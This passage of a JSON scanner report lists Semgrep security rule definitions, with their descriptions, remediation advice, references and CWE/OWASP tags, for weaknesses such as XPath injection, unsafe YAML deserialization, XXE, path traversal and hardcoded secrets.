attacks."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","id":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","name":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"help":{"markdown":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor)\n - [https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability](https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability)\n","text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"helpUri":"https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","id":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","name":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","id":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","name":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","id":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","name":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","id":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","name":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SonarQube Docs API Key detected"},"help":{"markdown":"SonarQube Docs API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SonarQube Docs API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","id":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","name":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"help":{"markdown":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli)\n - [https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf)\n","text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"helpUri":"https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","id":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","name":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","id":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","name":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","id":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","name":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"help":{"markdown":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server)\n - [https://nodejs.org/api/http.html#http_class_http_agent](https://nodejs.org/api/http.html#http_class_http_agent)\n - [https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY](https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY)\n","text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","id":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","name":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"help":{"markdown":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","id":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","name":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","id":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","name":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"help":{"markdown":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/](https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n","text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"helpUri":"https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","id":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","name":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.xml.should-resolve-xxe.swift-xxe-prevention"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"help":{"markdown":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","id":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","name":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"help":{"markdown":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - 